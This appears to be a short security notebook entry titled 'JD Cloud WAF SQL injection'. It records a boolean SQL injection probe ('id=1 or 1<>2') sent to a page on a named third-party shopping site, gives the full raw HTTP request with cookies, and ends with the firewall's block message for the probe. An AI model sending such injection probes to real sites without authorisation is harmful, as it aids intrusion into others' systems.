京东云 WAF SQL 注入
http://www.yunxianpi.com/wap/buyers/index/index.htmlhttp://www.yunxianpi.com/wap/buyers/index/index.html?id=1%20or%201%3C%3E2
Last updated
http://www.yunxianpi.com/wap/buyers/index/index.htmlhttp://www.yunxianpi.com/wap/buyers/index/index.html?id=1%20or%201%3C%3E2
Last updated
GET /wap/buyers/index/index.html?id=1%20or%201%3C%3E2 HTTP/1.1
Host: www.yunxianpi.com
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPad; CPU OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.77 Mobile/15E148 Safari/604.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=zh; subsite_id=0; subsite_name=%E5%85%A8%E9%83%A8; site_id=84; site_name=%E5%A4%A7%E4%B8%8A%E6%B5%B7%E5%9C%B0%E5%8C%BAwaf:sdk:10087->block((10087:1 or 1<>2))||->().